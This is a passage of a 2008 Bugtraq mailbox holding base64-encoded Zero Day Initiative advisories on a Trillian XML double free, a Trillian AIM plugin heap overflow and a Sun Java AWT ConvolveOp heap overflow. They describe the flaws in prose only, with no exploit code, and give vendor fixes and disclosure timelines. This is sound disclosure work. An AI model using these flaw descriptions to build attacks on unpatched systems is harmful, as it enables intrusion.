X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/04/2008 04:18:12 PM,
Serialize complete at 12/04/2008 04:18:12 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA3ODogVHJpbGxpYW4gSU1HIFNSQyBJRCBNZW1vcnkgQ29ycnVwdGlvbiBWdWxuZXJh
YmlsaXR5DQpodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbS9hZHZpc29yaWVzL1pESS0w
OC0wNzgNCkRlY2VtYmVyIDQsIDIwMDgNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoNCkNlcnVsZWFu
IFN0dWRpb3MNCg0KLS0gQWZmZWN0ZWQgUHJvZHVjdHM6DQpDZXJ1bGVhbiBTdHVkaW9zIFRyaWxs
aWFuDQoNCi0tIFZ1bG5lcmFiaWxpdHkgRGV0YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0eSBhbGxv
d3MgcmVtb3RlIGF0dGFja2VycyB0byBwb3RlbnRpYWxseSBleGVjdXRlDQphcmJpdHJhcnkgY29k
ZSBvbiB2dWxuZXJhYmxlIGluc3RhbGxhdGlvbnMgb2YgQ2VydWxlYW4gU3R1ZGlvcyBUcmlsbGlh
bi4NCkF1dGhlbnRpY2F0aW9uIGlzIG5vdCByZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVy
YWJpbGl0eS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhpc3RzIHdpdGhpbiB0aGUgWE1MIHByb2Nl
c3NpbmcgY29kZSBmb3IgVHJpbGxpYW4uDQpXaGVuIHBhcnNpbmcgc3BlY2lhbGx5IGZvcm11bGF0
ZWQgeG1sLCB0aGUgYXBwbGljYXRpb24gd2lsbCBjb3JydXB0IGFuDQppbnRlcm5hbCBkYXRhIHN0
cnVjdHVyZS4gV2hpbHN0IGRlYWxsb2NhdGluZyB0aGlzIGRhdGEgc3RydWN0dXJlLCB0aGUNCmFw
cGxpY2F0aW9uIGNhbiBiZSB0cmlja2VkIGludG8gZnJlZWluZyBhIHNpbmdsZSBhbGxvY2F0ZWQg
Y2h1bmsNCm11bHRpcGxlIHRpbWVzLCB3aGljaCBjYW4gcG90ZW50aWFsbHkgbGVhZCB0byBjb2Rl
IGV4ZWN1dGlvbi4NCg0KLS0gVmVuZG9yIFJlc3BvbnNlOg0KVHJpbGxpYW4gaGFzIGlzc3VlZCBh
biB1cGRhdGUgdG8gY29ycmVjdCB0aGlzIHZ1bG5lcmFiaWxpdHkuIE1vcmUNCmRldGFpbHMgY2Fu
IGJlIGZvdW5kIGF0Og0KDQpodHRwOi8vYmxvZy5jZXJ1bGVhbnN0dWRpb3MuY29tLz9wPTQwNA0K
DQotLSBEaXNjbG9zdXJlIFRpbWVsaW5lOg0KMjAwOC0xMS0xMCAtIFZ1bG5lcmFiaWxpdHkgcmVw
b3J0ZWQgdG8gdmVuZG9yDQoyMDA4LTEyLTA0IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ug
b2YgYWR2aXNvcnkNCg0KLS0gQ3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3Zl
cmVkIGJ5Og0KICAgICogRGFtaWFuIFB1dA0KDQotLSBBYm91dCB0aGUgWmVybyBEYXkgSW5pdGlh
dGl2ZSAoWkRJKToNCkVzdGFibGlzaGVkIGJ5IFRpcHBpbmdQb2ludCwgVGhlIFplcm8gRGF5IElu
aXRpYXRpdmUgKFpESSkgcmVwcmVzZW50cyANCmEgYmVzdC1vZi1icmVlZCBtb2RlbCBmb3IgcmV3
YXJkaW5nIHNlY3VyaXR5IHJlc2VhcmNoZXJzIGZvciByZXNwb25zaWJseQ0KZGlzY2xvc2luZyBk
aXNjb3ZlcmVkIHZ1bG5lcmFiaWxpdGllcy4NCg0KUmVzZWFyY2hlcnMgaW50ZXJlc3RlZCBpbiBn
ZXR0aW5nIHBhaWQgZm9yIHRoZWlyIHNlY3VyaXR5IHJlc2VhcmNoDQp0aHJvdWdoIHRoZSBaREkg
Y2FuIGZpbmQgbW9yZSBpbmZvcm1hdGlvbiBhbmQgc2lnbi11cCBhdDoNCg0KICAgIGh0dHA6Ly93
d3cuemVyb2RheWluaXRpYXRpdmUuY29tDQoNClRoZSBaREkgaXMgdW5pcXVlIGluIGhvdyB0aGUg
YWNxdWlyZWQgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBpcw0KdXNlZC4gVGlwcGluZ1BvaW50
IGRvZXMgbm90IHJlLXNlbGwgdGhlIHZ1bG5lcmFiaWxpdHkgZGV0YWlscyBvciBhbnkNCmV4cGxv
aXQgY29kZS4gSW5zdGVhZCwgdXBvbiBub3RpZnlpbmcgdGhlIGFmZmVjdGVkIHByb2R1Y3QgdmVu
ZG9yLA0KVGlwcGluZ1BvaW50IHByb3ZpZGVzIGl0cyBjdXN0b21lcnMgd2l0aCB6ZXJvIGRheSBw
cm90ZWN0aW9uIHRocm91Z2gNCml0cyBpbnRydXNpb24gcHJldmVudGlvbiB0ZWNobm9sb2d5LiBF
eHBsaWNpdCBkZXRhaWxzIHJlZ2FyZGluZyB0aGUNCnNwZWNpZmljcyBvZiB0aGUgdnVsbmVyYWJp
bGl0eSBhcmUgbm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMgdW50aWwNCmFuIG9mZmljaWFsIHZl
bmRvciBwYXRjaCBpcyBwdWJsaWNseSBhdmFpbGFibGUuIEZ1cnRoZXJtb3JlLCB3aXRoIHRoZQ0K
YWx0cnVpc3RpYyBhaW0gb2YgaGVscGluZyB0byBzZWN1cmUgYSBicm9hZGVyIHVzZXIgYmFzZSwg
VGlwcGluZ1BvaW50DQpwcm92aWRlcyB0aGlzIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gY29u
ZmlkZW50aWFsbHkgdG8gc2VjdXJpdHkNCnZlbmRvcnMgKGluY2x1ZGluZyBjb21wZXRpdG9ycykg
d2hvIGhhdmUgYSB2dWxuZXJhYmlsaXR5IHByb3RlY3Rpb24gb3INCm1pdGlnYXRpb24gcHJvZHVj
dC4NCg0KT3VyIHZ1bG5lcmFiaWxpdHkgZGlzY2xvc3VyZSBwb2xpY3kgaXMgYXZhaWxhYmxlIG9u
bGluZSBhdDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlzb3Jp
ZXMvZGlzY2xvc3VyZV9wb2xpY3kvDQoNCkNPTkZJREVOVElBTElUWSBOT1RJQ0U6IFRoaXMgZS1t
YWlsIG1lc3NhZ2UsIGluY2x1ZGluZyBhbnkgYXR0YWNobWVudHMsDQppcyBiZWluZyBzZW50IGJ5
IDNDb20gZm9yIHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5kZWQgcmVjaXBpZW50KHMpIGFuZA0K
bWF5IGNvbnRhaW4gY29uZmlkZW50aWFsLCBwcm9wcmlldGFyeSBhbmQvb3IgcHJpdmlsZWdlZCBp
bmZvcm1hdGlvbi4NCkFueSB1bmF1dGhvcml6ZWQgcmV2aWV3LCB1c2UsIGRpc2Nsb3N1cmUgYW5k
L29yIGRpc3RyaWJ1dGlvbiBieSBhbnkgDQpyZWNpcGllbnQgaXMgcHJvaGliaXRlZC4gIElmIHlv
dSBhcmUgbm90IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBsZWFzZQ0KZGVsZXRlIGFuZC9vciBk
ZXN0cm95IGFsbCBjb3BpZXMgb2YgdGhpcyBtZXNzYWdlIHJlZ2FyZGxlc3Mgb2YgZm9ybSBhbmQN
CmFueSBpbmNsdWRlZCBhdHRhY2htZW50cyBhbmQgbm90aWZ5IDNDb20gaW1tZWRpYXRlbHkgYnkg
Y29udGFjdGluZyB0aGUNCnNlbmRlciB2aWEgcmVwbHkgZS1tYWlsIG9yIGZvcndhcmRpbmcgdG8g
M0NvbSBhdCBwb3N0bWFzdGVyQDNjb20uY29tLiANCg=
From - Fri Dec  5 11:18:24 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d63
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38834-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E5092EEFFC
for <lists@securityspace.com>; Fri,  5 Dec 2008 11:16:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6B157236FAC; Fri,  5 Dec 2008 08:45:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16226 invoked from network); 5 Dec 2008 00:02:11 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEEE6FF78.89410A1E-ON88257516.00015062-86257516.0001B011@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Thu, 4 Dec 2008 18:18:26 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/04/2008 04:18:31 PM,
Serialize complete at 12/04/2008 04:18:31 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA3OTogVHJpbGxpYW4gQUlNIFBsdWdpbiBNYWxmb3JtZWQgWE1MIFRhZyBIZWFwIE92
ZXJmbG93IA0KVnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20v
YWR2aXNvcmllcy9aREktMDgtMDc5DQpEZWNlbWJlciA0LCAyMDA4DQoNCi0tIEFmZmVjdGVkIFZl
bmRvcnM6DQpDZXJ1bGVhbiBTdHVkaW9zDQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KQ2VydWxl
YW4gU3R1ZGlvcyBUcmlsbGlhbg0KDQotLSBWdWxuZXJhYmlsaXR5IERldGFpbHM6DQpUaGlzIHZ1
bG5lcmFiaWxpdHkgYWxsb3dzIHJlbW90ZSBhdHRhY2tlcnMgdG8gZXhlY3V0ZSBhcmJpdHJhcnkg
Y29kZSBvbg0KdnVsbmVyYWJsZSBpbnN0YWxsYXRpb25zIG9mIENlcnVsZWFuIFN0dWRpb3MgVHJp
bGxpYW4uIEF1dGhlbnRpY2F0aW9uIGlzDQpub3QgcmVxdWlyZWQgdG8gZXhwbG9pdCB0aGlzIHZ1
bG5lcmFiaWxpdHkuDQoNClRoZSBzcGVjaWZpYyBmbGF3IGV4aXN0cyB3aXRoaW4gdGhlIFhNTCBw
cm9jZXNzaW5nIGNvZGUgZm9yIFRyaWxsaWFuLg0KV2hlbiBwYXJzaW5nIGEgbWFsZm9ybWVkIFhN
TCB0YWcsIHRoZSBhcHBsaWNhdGlvbiBkb2VzIG5vdCBhbGxvY2F0ZQ0KZW5vdWdoIHNwYWNlIGZv
ciBpdCdzIGNvbnRlbnRzLiBEdXJpbmcgY29weWluZyBvZiB0aGlzIHRvIHRoZSBuZXdseQ0KYWxs
b2NhdGVkIGJ1ZmZlciwgdGhlIGFwcGxpY2F0aW9uIHdpbGwgb3ZlcndyaXRlIGhlYXAgc3RydWN0
dXJlcyB3aXRoDQphdHRhY2tlci1zdXBwbGllZCBkYXRhIHRoYXQgY2FuIHRoZW4gYmUgbGV2ZXJh
Z2VkIHRvIGFjaGlldmUgY29kZQ0KZXhlY3V0aW9uIHdpdGggdGhlIHByaXZpbGVnZXMgb2YgdGhl
IGFwcGxpY2F0aW9uLg0KDQotLSBWZW5kb3IgUmVzcG9uc2U6DQpDZXJ1bGVhbiBTdHVkaW9zIGhh
cyBpc3N1ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpk
ZXRhaWxzIGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0cDovL2Jsb2cuY2VydWxlYW5zdHVkaW9zLmNv
bS8/cD00MDQNCg0KLS0gRGlzY2xvc3VyZSBUaW1lbGluZToNCjIwMDgtMTEtMjQgLSBWdWxuZXJh
YmlsaXR5IHJlcG9ydGVkIHRvIHZlbmRvcg0KMjAwOC0xMi0wNCAtIENvb3JkaW5hdGVkIHB1Ymxp
YyByZWxlYXNlIG9mIGFkdmlzb3J5DQoNCi0tIENyZWRpdDoNClRoaXMgdnVsbmVyYWJpbGl0eSB3
YXMgZGlzY292ZXJlZCBieToNCiAgICAqIERhbWlhbiBQdXQNCg0KLS0gQWJvdXQgdGhlIFplcm8g
RGF5IEluaXRpYXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQsIFRoZSBa
ZXJvIERheSBJbml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qtb2YtYnJlZWQgbW9k
ZWwgZm9yIHJld2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2libHkNCmRp
c2Nsb3NpbmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2VhcmNoZXJzIGludGVy
ZXN0ZWQgaW4gZ2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaA0KdGhyb3Vn
aCB0aGUgWkRJIGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24tdXAgYXQ6DQoNCiAg
ICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJIGlzIHVuaXF1ZSBp
biBob3cgdGhlIGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gaXMNCnVzZWQuIFRp
cHBpbmdQb2ludCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFpbHMgb3Ig
YW55DQpleHBsb2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRoZSBhZmZlY3RlZCBw
cm9kdWN0IHZlbmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3VzdG9tZXJzIHdpdGgg
emVybyBkYXkgcHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHByZXZlbnRpb24gdGVj
aG5vbG9neS4gRXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVjaWZpY3Mgb2YgdGhl
IHZ1bG5lcmFiaWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVzIHVudGlsDQphbiBv
ZmZpY2lhbCB2ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBGdXJ0aGVybW9yZSwg
d2l0aCB0aGUNCmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJlIGEgYnJvYWRlciB1
c2VyIGJhc2UsIFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJhYmlsaXR5IGluZm9y
bWF0aW9uIGNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChpbmNsdWRpbmcgY29t
cGV0aXRvcnMpIHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9uIG9yDQptaXRpZ2F0
aW9uIHByb2R1Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUgcG9saWN5IGlzIGF2
YWlsYWJsZSBvbmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNv
bS9hZHZpc29yaWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJQUxJVFkgTk9USUNF
OiBUaGlzIGUtbWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzLA0KaXMgYmVp
bmcgc2VudCBieSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVu
dChzKSBhbmQNCm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRhcnkgYW5kL29yIHBy
aXZpbGVnZWQgaW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNlLCBkaXNj
bG9zdXJlIGFuZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50IGlzIHByb2hpYml0
ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UNCmRlbGV0
ZSBhbmQvb3IgZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSByZWdhcmRsZXNzIG9m
IGZvcm0gYW5kDQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlmeSAzQ29tIGltbWVk
aWF0ZWx5IGJ5IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUtbWFpbCBvciBmb3J3
YXJkaW5nIHRvIDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Fri Dec  5 11:28:26 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d65
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38835-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 64FE3EE546
for <lists@securityspace.com>; Fri,  5 Dec 2008 11:26:43 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 22857237020; Fri,  5 Dec 2008 08:45:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16249 invoked from network); 5 Dec 2008 00:02:33 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFFBD5027E.3148BD43-ON88257516.000150F1-86257516.0001B74D@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Thu, 4 Dec 2008 18:18:45 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/04/2008 04:18:48 PM,
Serialize complete at 12/04/2008 04:18:48 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4MDogU3VuIEphdmEgQVdUIExpYnJhcnkgU2FuZGJveCBWaW9sYXRpb24gVnVsbmVy
YWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9aREkt
MDgtMDgwDQpEZWNlbWJlciA0LCAyMDA4DQoNCi0tIEFmZmVjdGVkIFZlbmRvcnM6DQpTdW4gTWlj
cm9zeXN0ZW1zDQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KU3VuIE1pY3Jvc3lzdGVtcyBKYXZh
IFJ1bnRpbWUNCg0KLS0gVGlwcGluZ1BvaW50KFRNKSBJUFMgQ3VzdG9tZXIgUHJvdGVjdGlvbjoN
ClRpcHBpbmdQb2ludCBJUFMgY3VzdG9tZXJzIGhhdmUgYmVlbiBwcm90ZWN0ZWQgYWdhaW5zdCB0
aGlzDQp2dWxuZXJhYmlsaXR5IGJ5IERpZ2l0YWwgVmFjY2luZSBwcm90ZWN0aW9uIGZpbHRlciBJ
RCA2MjQ5LiANCkZvciBmdXJ0aGVyIHByb2R1Y3QgaW5mb3JtYXRpb24gb24gdGhlIFRpcHBpbmdQ
b2ludCBJUFMsIHZpc2l0Og0KDQogICAgaHR0cDovL3d3dy50aXBwaW5ncG9pbnQuY29tDQoNCi0t
IFZ1bG5lcmFiaWxpdHkgRGV0YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0eSBhbGxvd3MgcmVtb3Rl
IGF0dGFja2VycyB0byBleGVjdXRlIGFyYml0cmFyeSBjb2RlIG9uDQp2dWxuZXJhYmxlIGluc3Rh
bGxhdGlvbnMgb2YgU3VuIE1pY3Jvc3lzdGVtcyBKYXZhLiBVc2VyIGludGVyYWN0aW9uIGlzDQpy
ZXF1aXJlZCBpbiB0aGF0IGEgdXNlciBtdXN0IG9wZW4gYSBtYWxpY2lvdXMgZmlsZSBvciB2aXNp
dCBhIG1hbGljaW91cw0Kd2ViIHBhZ2UuDQoNClRoZSBzcGVjaWZpYyBmbGF3IG9jY3VycyB3aXRo
aW4gdGhlIEphdmEgQVdUIGxpYnJhcnkuIElmIGEgY3VzdG9tIGltYWdlDQptb2RlbCBpcyB1c2Vk
IGZvciB0aGUgc291cmNlICdSYXN0ZXInIGR1cmluZyBhIGNvbnZlcnNpb24gdGhyb3VnaCBhDQon
Q29udm9sdmVPcCcgb3BlcmF0aW9uLCB0aGUgaW1hZ2luZyBsaWJyYXJ5IHdpbGwgY2FsY3VsYXRl
IHRoZSBzaXplIG9mDQp0aGUgZGVzdGluYXRpb24gcmFzdGVyIGZvciB0aGUgY29udmVyc2lvbiBp
bmNvcnJlY3RseSBsZWFkaW5nIHRvIGENCmhlYXAtYmFzZWQgb3ZlcmZsb3cuIFRoaXMgY2FuIHJl
c3VsdCBpbiBhcmJpdHJhcnkgY29kZSBleGVjdXRpb24gdW5kZXINCnRoZSBjb250ZXh0IG9mIHRo
ZSBjdXJyZW50IHVzZXIuDQoNCi0tIFZlbmRvciBSZXNwb25zZToNClN1biBNaWNyb3N5c3RlbXMg
aGFzIGlzc3VlZCBhbiB1cGRhdGUgdG8gY29ycmVjdCB0aGlzIHZ1bG5lcmFiaWxpdHkuIE1vcmUN
CmRldGFpbHMgY2FuIGJlIGZvdW5kIGF0Og0KDQpodHRwOi8vc3Vuc29sdmUuc3VuLmNvbS9zZWFy
Y2gvZG9jdW1lbnQuZG8/YXNzZXRrZXk9MS02Ni0yNDQ5ODctMQ0KDQotLSBEaXNjbG9zdXJlIFRp
bWVsaW5lOg0KMjAwOC0wNC0xNiAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8gdmVuZG9yDQoy
MDA4LTEyLTA0IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNvcnkNCg0KLS0g
Q3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0KICAgICogQW5v
bnltb3VzDQoNCi0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpOg0KRXN0YWJs
aXNoZWQgYnkgVGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKSByZXBy
ZXNlbnRzIA0KYSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcgc2VjdXJpdHkgcmVz
ZWFyY2hlcnMgZm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVyZWQgdnVsbmVyYWJp
bGl0aWVzLg0KDQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcgcGFpZCBmb3IgdGhl
aXIgc2VjdXJpdHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmluZCBtb3JlIGluZm9y
bWF0aW9uIGFuZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2
ZS5jb20NCg0KVGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJlZCB2dWxuZXJhYmls
aXR5IGluZm9ybWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBub3QgcmUtc2VsbCB0
aGUgdnVsbmVyYWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2RlLiBJbnN0ZWFkLCB1
cG9uIG5vdGlmeWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpUaXBwaW5nUG9pbnQg
cHJvdmlkZXMgaXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rpb24gdGhyb3VnaA0K
aXRzIGludHJ1c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0IGRldGFpbHMgcmVn
YXJkaW5nIHRoZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFyZSBub3QgZXhwb3Nl
ZCB0byBhbnkgcGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBhdGNoIGlzIHB1Ymxp
Y2x5IGF2YWlsYWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlzdGljIGFpbSBvZiBo
ZWxwaW5nIHRvIHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5nUG9pbnQNCnByb3Zp
ZGVzIHRoaXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRpYWxseSB0byBzZWN1
cml0eQ0KdmVuZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2ZSBhIHZ1bG5lcmFi
aWxpdHkgcHJvdGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpPdXIgdnVsbmVyYWJp
bGl0eSBkaXNjbG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0Og0KDQogICAgaHR0
cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNjbG9zdXJlX3BvbGlj
eS8NCg0KQ09ORklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVzc2FnZSwgaW5jbHVk
aW5nIGFueSBhdHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBmb3IgdGhlIHNvbGUg
dXNlIG9mIHRoZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29udGFpbiBjb25maWRl
bnRpYWwsIHByb3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0aW9uLg0KQW55IHVu
YXV0aG9yaXplZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlzdHJpYnV0aW9uIGJ5
IGFueSANCnJlY2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBub3QgdGhlIGludGVu
ZGVkIHJlY2lwaWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kgYWxsIGNvcGllcyBv
ZiB0aGlzIG1lc3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGluY2x1ZGVkIGF0dGFj
aG1lbnRzIGFuZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0aW5nIHRoZQ0Kc2Vu
ZGVyIHZpYSByZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0IHBvc3RtYXN0ZXJA
M2NvbS5jb20uIA0K

From - Fri Dec  5 11:38:28 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004d66
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38836-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 52391EEFFC
for <lists@securityspace.com>; Fri,  5 Dec 2008 11:34:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
